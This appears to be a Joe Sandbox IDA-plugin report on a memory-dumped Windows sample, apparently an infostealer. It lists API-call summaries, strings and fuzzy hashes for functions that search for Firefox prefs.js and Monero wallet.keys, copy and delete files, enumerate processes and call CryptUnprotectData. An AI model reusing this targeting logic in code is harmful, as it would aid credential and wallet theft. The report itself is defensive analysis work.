Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 07ea1bdeac9881967ca0160ee35cd9b25b96cd59c1a65b4f597643a372d31260
Instruction ID: db0633b312ff8edc6857c482eff9635cf5af03c05323377696825c0367566fc2
Opcode Fuzzy Hash: 07ea1bdeac9881967ca0160ee35cd9b25b96cd59c1a65b4f597643a372d31260
Instruction Fuzzy Hash: 8D5124B2900118ABCB24EBA0DC85FEA777CBB94344F408598F64E97150DF759B89CF64

Function 0095F4F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0097155C,00970D7E), ref: 0095F55E
StrCmpCA.SHLWAPI(?,00971560), ref: 0095F5AF
StrCmpCA.SHLWAPI(?,00971564), ref: 0095F5C5
FindNextFileA.KERNELBASE(000000FF,?), ref: 0095F8F1
FindClose.KERNEL32(000000FF), ref: 0095F903

Strings

prefs.js, xrefs: 0095F652

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 552a82fcf990aefd7701d3ed48b618448e67bd05b3663c5f9174a50e55198871
Instruction ID: 7e0a72988e8701788208cad778f915913de2ed66ec5827625c45bcef37d7db5d
Opcode Fuzzy Hash: 552a82fcf990aefd7701d3ed48b618448e67bd05b3663c5f9174a50e55198871
Instruction Fuzzy Hash: 37B101719042089BCB24FB64DC96FEE7379AFD5300F0085A8E90A67151EF71AB49CF92

Function 00951710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0097500C,?,?,?,009750B4,?,?,00000000,?,00000000), ref: 00951963
StrCmpCA.SHLWAPI(?,0097515C), ref: 009519B3
StrCmpCA.SHLWAPI(?,00975204), ref: 009519C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00951D80
DeleteFileA.KERNEL32(00000000), ref: 00951E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00951E60
FindClose.KERNEL32(000000FF), ref: 00951E72

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Strings

\*.*, xrefs: 00951831

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 0568ed82a634549ea94c473be8760983f4a96441f4a5005d3bdb2afba0069057
Instruction ID: de03c1e9f1a1a11a4b6a249138c2623b2274b3657eb86c63e277fef0e38e0bbe
Opcode Fuzzy Hash: 0568ed82a634549ea94c473be8760983f4a96441f4a5005d3bdb2afba0069057
Instruction Fuzzy Hash: E9120A719541189BCB19FB60DCA6FEE7378AF95300F4045A9B51A72091EF706F88CFA2

Function 0095D8C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00971454,00970B96), ref: 0095D92B
StrCmpCA.SHLWAPI(?,00971458), ref: 0095D973
StrCmpCA.SHLWAPI(?,0097145C), ref: 0095D989
FindNextFileA.KERNELBASE(000000FF,?), ref: 0095DC0C
FindClose.KERNEL32(000000FF), ref: 0095DC1E

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: b9ecd065cdc297b42fb8f8c265c316846c6c49d7a85ac65277a843d7ac314f73
Instruction ID: b18585660b8b1f56df4e68bb13b51a93281b8cb99c63de194a009b9f6eefff12
Opcode Fuzzy Hash: b9ecd065cdc297b42fb8f8c265c316846c6c49d7a85ac65277a843d7ac314f73
Instruction Fuzzy Hash: 4E911D729042049BCB14FB74EC96EED777DABC5301F018668FD0AA6191EE349B5C8F92

Function 00967630 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

GetKeyboardLayoutList.USER32(00000000,00000000,0097059F), ref: 00967681
LocalAlloc.KERNEL32(00000040,?), ref: 00967699
GetKeyboardLayoutList.USER32(?,00000000), ref: 009676AD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00967702
LocalFree.KERNEL32(00000000), ref: 009677C2

Strings

/ , xrefs: 0096771F

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 898b9ba05c55f74be767c5a886348176ab542bbc33d4326061bcc81a1d07c817
Instruction ID: a1354996951fd6c2d73ba8b8f51ce6b91ad8cab0c6d2c3af68813140d13b44b5
Opcode Fuzzy Hash: 898b9ba05c55f74be767c5a886348176ab542bbc33d4326061bcc81a1d07c817
Instruction Fuzzy Hash: 4C414B71945218ABCB24DB94DC99FEEB778FF88704F204199E10A76290DB746F84CFA1

Function 0095E270 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00970C1F), ref: 0095E2E2
StrCmpCA.SHLWAPI(?,0097149C), ref: 0095E332
StrCmpCA.SHLWAPI(?,009714A0), ref: 0095E348
FindNextFileA.KERNEL32(000000FF,?), ref: 0095EA1F

Strings

\*.*, xrefs: 0095E28D

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 1a63c3938cc5131585911331be7be0f9dd725767d1ec4907480692b11bf7dcfb
Instruction ID: 5886040ab936b0d9107ad82cdc9e98a39778982914e0f2b170d457278c054c78
Opcode Fuzzy Hash: 1a63c3938cc5131585911331be7be0f9dd725767d1ec4907480692b11bf7dcfb
Instruction Fuzzy Hash: 8B120D729141189BCB18FB60DCA6FED7378AFD5300F4145A9B90A72091EE756F88CF92

Function 009690A0 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009690BE
Process32First.KERNEL32(00970AB3,00000128), ref: 009690D2
Process32Next.KERNEL32(00970AB3,00000128), ref: 009690E7
StrCmpCA.SHLWAPI(?,00000000), ref: 009690FC
CloseHandle.KERNEL32(00970AB3), ref: 0096911A

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d1dd2e9d7378f2fcef35fbedb974e4061502e2d343a636dc945cc61c87392ddd
Instruction ID: e8d2b9604e0a54d234c95aea2a125004de6e2650a52c6020514b95902f1ab5a8
Opcode Fuzzy Hash: d1dd2e9d7378f2fcef35fbedb974e4061502e2d343a636dc945cc61c87392ddd
Instruction Fuzzy Hash: 77011A75A04208EBDB10DFA4CD99BEDBBFCAF48744F104588E509A7240DB749B84DF50

Function 009674D0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0120EAC0,00000000,?,00970DE0,00000000,?,00000000,00000000), ref: 00967503
RtlAllocateHeap.NTDLL(00000000), ref: 0096750A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0120EAC0,00000000,?,00970DE0,00000000,?,00000000,00000000,?), ref: 0096751D
wsprintfA.USER32 ref: 00967557

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 903a6253901f83241e0c7210ebed08ae0bf747342f3986dc7e5c3676be6de8ff
Instruction ID: f9edc6cefae03ec4a8741d20f0fc7463c40d219a995a511575b26ad57e47e41c
Opcode Fuzzy Hash: 903a6253901f83241e0c7210ebed08ae0bf747342f3986dc7e5c3676be6de8ff
Instruction Fuzzy Hash: E7118EB1E05218EBEB20CB54DC49FA9BB78FB44725F1047D9F51A932D0DB745984CB50

Function 00959BB0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00959BD4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00959BF3
LocalFree.KERNEL32(?), ref: 00959C23

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
